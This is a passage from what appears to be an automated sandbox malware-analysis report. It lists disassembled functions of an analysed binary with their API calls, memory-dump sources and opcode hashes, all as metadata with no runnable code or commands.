                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: GdiplusShutdownUninitialize
                                                                              • String ID:
                                                                              • API String ID: 3856339756-0
                                                                              • Opcode ID: 6c26c14ea9cdb6d4a490a83ba54232ed5f5c725ac1a45efcd1d6377addeeaa23
                                                                              • Instruction ID: ac15c6a429043913fb8b0082779ec58d6b27fabf113a280b77c21c7146a382ef
                                                                              • Opcode Fuzzy Hash: 6c26c14ea9cdb6d4a490a83ba54232ed5f5c725ac1a45efcd1d6377addeeaa23
                                                                              • Instruction Fuzzy Hash: 75F08276604644EFC701DF19EC05B5ABBB9FB48730F008226E816D37A0CB75A804CBA4
                                                                              Function 00DEE1FA Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000000,00000000,?,00DF1EF6,?,00000000,?,?,00DF1F1B,?,00000007,?,?,00DF22FB,?,?), ref: 00DEE210
                                                                              • GetLastError.KERNEL32(?,?,00DF1EF6,?,00000000,?,?,00DF1F1B,?,00000007,?,?,00DF22FB,?,?), ref: 00DEE21B
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 485612231-0
                                                                              • Opcode ID: 4e2ad56c39749f73b655d5372bcf1539e000ebb3a1388e94dfa172b759cf3e6f
                                                                              • Instruction ID: e4178b58de3d98b90f5e68912782a2a6be4d61687a138fce319d450ed2a874fd
                                                                              • Opcode Fuzzy Hash: 4e2ad56c39749f73b655d5372bcf1539e000ebb3a1388e94dfa172b759cf3e6f
                                                                              • Instruction Fuzzy Hash: 6FE08632140358ABDB113FA2EC09B993B58EB00361F098011F608DA271DB308880CBB8
                                                                              Function 00DE649C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DE64BA
                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00DE64C5
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                              • String ID:
                                                                              • API String ID: 1660781231-0
                                                                              • Opcode ID: a0bc10f783258fd49d0096395611d06361885b1f3bc440d424332c3cff63f762
                                                                              • Instruction ID: 06781bf19ec4365d6c309f083233f8c76b90d35cf8ebadf9241d87b6ab42d5b8
                                                                              • Opcode Fuzzy Hash: a0bc10f783258fd49d0096395611d06361885b1f3bc440d424332c3cff63f762
                                                                              • Instruction Fuzzy Hash: C9D0227100CBC218EE9077B7681684A2340EE32BF83B4264AF670A73C3EF19C04C6031
                                                                              Function 00DC2215 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ItemShowWindow
                                                                              • String ID:
                                                                              • API String ID: 3351165006-0
                                                                              • Opcode ID: e69e96ad2f74b61d66784322a17dc8002a221fd1d7c44cfd8806a27ae0fb48ce
                                                                              • Instruction ID: 9a899f70271aab68373e96d62e82b7f07fa4339ab996e40c095061e24b1ed8dc
                                                                              • Opcode Fuzzy Hash: e69e96ad2f74b61d66784322a17dc8002a221fd1d7c44cfd8806a27ae0fb48ce
                                                                              • Instruction Fuzzy Hash: CDC08CF22681003E86004FB19C0DCB73AAC96B2B02704CA08B062D0280D13CC4448620
                                                                              Function 00DC2BE2 Relevance: 1.8, APIs: 1, Instructions: 313COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3
                                                                              • String ID:
                                                                              • API String ID: 431132790-0
                                                                              • Opcode ID: 00b86b306453cb428363e53d28c1200e030b8a046b4332f3259c86197c25eeb7
                                                                              • Instruction ID: 77c6e1a9fb47b95e8420c2c501097fca4a9b222b85a7bee37b07e1fa00c75ff2
                                                                              • Opcode Fuzzy Hash: 00b86b306453cb428363e53d28c1200e030b8a046b4332f3259c86197c25eeb7
                                                                              • Instruction Fuzzy Hash: D0C18F30A042469BDF15DF28C894BFD7BA4AF56300F0C80BEE846DB296CB349945CBB1
                                                                              Function 00DF060E Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCPInfo.KERNEL32(FFFFF9AD,?,00000005,00DF084A,?), ref: 00DF0640
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Info
                                                                              • String ID:
                                                                              • API String ID: 1807457897-0
                                                                              • Opcode ID: c1147b093f9c9eaaa1b17d5139753d8cbc25c9d4d6ef375c3db75ea260be7cc9
                                                                              • Instruction ID: 9225028bfe9f412afca848b52060580f1ea6fb071fcbc76e27f2b86293e173f4
                                                                              • Opcode Fuzzy Hash: c1147b093f9c9eaaa1b17d5139753d8cbc25c9d4d6ef375c3db75ea260be7cc9
                                                                              • Instruction Fuzzy Hash: A05123B190815CAADB119B28CD84BF9BFACEB15304F2881E9E689C7143C375AD95CF70
                                                                              Function 00DC278A Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3.LIBCMT ref: 00DC2791
                                                                                • Part of subcall function 00DC9789: __EH_prolog3.LIBCMT ref: 00DC9790
                                                                                • Part of subcall function 00DD2345: __EH_prolog3.LIBCMT ref: 00DD234C
                                                                                • Part of subcall function 00DC8369: __EH_prolog3.LIBCMT ref: 00DC8370
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3
                                                                              • String ID:
                                                                              • API String ID: 431132790-0
                                                                              • Opcode ID: e35408822b1386e8d7f0097664ef9fbffc628152e6fad76ef0732fcc9d4b4bc7
                                                                              • Instruction ID: d0d24388355a9e50227410e592b62ae2671b66c48d61353495145390d3e12e4b
                                                                              • Opcode Fuzzy Hash: e35408822b1386e8d7f0097664ef9fbffc628152e6fad76ef0732fcc9d4b4bc7
                                                                              • Instruction Fuzzy Hash: 0741C271A053818ECB45EF688491BD83BA0AF19310F0842BEED58DF29BEB741655CB72
                                                                              Function 00DCF07C Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3_
                                                                              • String ID:
                                                                              • API String ID: 2427045233-0
                                                                              • Opcode ID: 5cd629a3846a11c569a985cae2b7ca1bb27446273d87db68366632626853342e
                                                                              • Instruction ID: 91e80e4bd09933d07c3a82503981f07858fe3565c89c8bda606ba45f943e2f27
                                                                              • Opcode Fuzzy Hash: 5cd629a3846a11c569a985cae2b7ca1bb27446273d87db68366632626853342e
                                                                              • Instruction Fuzzy Hash: 2211E23074035696DF24A7308562FFD6763DFA3B10F0C111DE5822B2C7DE65494A92B6
                                                                              Function 00DC2690 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3_
                                                                              • String ID:
                                                                              • API String ID: 2427045233-0
                                                                              • Opcode ID: c33d20bba67853cca741b6f95fb69a517a3dbe2722ea0ce10b1bb71c304305a7
                                                                              • Instruction ID: e1716a81152ec51a4c45e5e68867a888de71e3617003302c83570f81529f577b
                                                                              • Opcode Fuzzy Hash: c33d20bba67853cca741b6f95fb69a517a3dbe2722ea0ce10b1bb71c304305a7
                                                                              • Instruction Fuzzy Hash: 12114231D042499ACB09EBA4E8A1EEDB378DF64304F64C01EF412A32A2DE615A09D771
                                                                              Function 00DCCFA1 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3
                                                                              • String ID:
                                                                              • API String ID: 431132790-0
                                                                              • Opcode ID: 2b9c46d9d2a376aaf08ad8ec55b7b1bb3fe4d5d11d6ba6da56fe1eea42cc1b54
                                                                              • Instruction ID: 54c6b95c9185f24ade2868c7de22f91573a1d844bf3cc1fef5894299a832b277
                                                                              • Opcode Fuzzy Hash: 2b9c46d9d2a376aaf08ad8ec55b7b1bb3fe4d5d11d6ba6da56fe1eea42cc1b54
                                                                              • Instruction Fuzzy Hash: 0F117372E0172756DB24FBB88C92FBF7266DF54300B15862DF511A7282DE34DD0586B0
                                                                              Function 00DF1134 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 137bbebed100b3ce26ef271819360c8d6e1dbcfe6dbfa445ba52255766f7caff
                                                                              • Instruction ID: f0006ec96bbf824c32c5896b93fa908dffc75dba8cfe0ee3e9206f55b9e52bad
                                                                              • Opcode Fuzzy Hash: 137bbebed100b3ce26ef271819360c8d6e1dbcfe6dbfa445ba52255766f7caff
                                                                              • Instruction Fuzzy Hash: 8E01D23B610318DFDB16CF69EC40A7633A5BB8572072A8124FB1897154DE32D84486A4
                                                                              Function 00DEF9F4 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00DE24EE,?,00DEDFF7,00000001,00000364,00DE24EE,00000006,000000FF,?,00DE3E9F,?,?,?), ref: 00DEFA35
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 88b3732d728d3fe1cb6197dd362bad336159f008e3e08270c68bb463944e8e3f
                                                                              • Instruction ID: f143f503df4de5475aa7085405e748aa8ad5d398a6efcd4f76649f2ae027c7dc
                                                                              • Opcode Fuzzy Hash: 88b3732d728d3fe1cb6197dd362bad336159f008e3e08270c68bb463944e8e3f
                                                                              • Instruction Fuzzy Hash: 84F082366902A566EB22BF779D46A6A3B49DF41770F194172BC0DEE191CA30DC0186F0
                                                                              Function 00DEE234 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000000,00DE24EE,?,?,00DE3E9F,?,?,?,?,?,00DE23FB,00DE24EE,?,?,?,?), ref: 00DEE266
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 607562df536a470d56bcdd72ca58aae41dbb9aac7533382b8c4b2e99fa529394
                                                                              • Instruction ID: ee68f7eb938277d2a6f6a08d06b23343653a63d088e585a684da60ecaa3a488e
                                                                              • Opcode Fuzzy Hash: 607562df536a470d56bcdd72ca58aae41dbb9aac7533382b8c4b2e99fa529394
                                                                              • Instruction Fuzzy Hash: 25E06D722402F16BEB213E679D01B6B3B4DDF823A0F190221FE5996291CB60CC0085F9
                                                                              Function 00DDCACE Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MessageBoxW.USER32(000204C2,00000000,?,00000000), ref: 00DDCAFE
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Message
                                                                              • String ID:
                                                                              • API String ID: 2030045667-0
                                                                              • Opcode ID: 67e7e6ca10fbaed4823131b53ae3ada158f7aa1ac4084ebb751b5cc5615132f3
                                                                              • Instruction ID: 1d1442cfa0a4d932a9451e612b538d7a9a1331bea0d7d9db70a62115894cceb6
                                                                              • Opcode Fuzzy Hash: 67e7e6ca10fbaed4823131b53ae3ada158f7aa1ac4084ebb751b5cc5615132f3
                                                                              • Instruction Fuzzy Hash: 50E0C2767142215B8B24FAE65C55DABE75FDFD5760F04882EB104E7392CA318C0883B0
                                                                              Function 00DD65B5 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00DD65EA
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ExecutionStateThread
                                                                              • String ID:
                                                                              • API String ID: 2211380416-0
                                                                              • Opcode ID: 339acfdbe67c0bcea1fb7d8d176e6005df911fa98c0f5b1b18cf386129e59050
                                                                              • Instruction ID: d6782684e7d7d1731e5c20e548605eb2cc725d2f28df6b901b34ccff925f7bf4
                                                                              • Opcode Fuzzy Hash: 339acfdbe67c0bcea1fb7d8d176e6005df911fa98c0f5b1b18cf386129e59050
                                                                              • Instruction Fuzzy Hash: 45D0C21160415116CE2537A9A805BBD06068FC2358F0940AFB005633CBCA444886D6B3
                                                                              Function 00DDD11A Relevance: 1.5, APIs: 1, Instructions: 20windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,00000000,00000000,00000000,?,00DDD166,00000000), ref: 00DDD137
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: BitmapCreateFromGdipStream
                                                                              • String ID:
                                                                              • API String ID: 1918208029-0
                                                                              • Opcode ID: c232bc0c64c24fee1e9b7c8718cee9e666696e94538423362c31994d0e329820
                                                                              • Instruction ID: 312fadda33d9604648f78c4238fe6fcea40a834e46be3d7b8ca5bd8215db9da2
                                                                              • Opcode Fuzzy Hash: c232bc0c64c24fee1e9b7c8718cee9e666696e94538423362c31994d0e329820
                                                                              • Instruction Fuzzy Hash: 92E08C71910318EFCF10AF95CC069AEBAEDEB45360F10405AA841E2320DBB09E40DBB0
                                                                              Function 00DDD00A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,00000000,00000000,00000000,00DDCBF1,?,00000000), ref: 00DDD01E
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: BitmapCreateFromGdip
                                                                              • String ID:
                                                                              • API String ID: 4184683939-0
                                                                              • Opcode ID: a8ac42632fbf9dca478063e96f3094767759a151b1f68574fa233773580b20ff
                                                                              • Instruction ID: 120a7bc5a02404a11dacdd6dbca829a00a31bebe606f7525ce54fc61e71918e9
                                                                              • Opcode Fuzzy Hash: a8ac42632fbf9dca478063e96f3094767759a151b1f68574fa233773580b20ff
                                                                              • Instruction Fuzzy Hash: ADD012321042216B8655FB58DC15C7F77AAEFC8310B04881FF549C2261CB204C52C775
                                                                              Function 00DE1EBE Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00DE1F67: RtlAcquireSRWLockExclusive.NTDLL ref: 00DE1F84
                                                                              • DloadProtectSection.DELAYIMP ref: 00DE1EE6
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
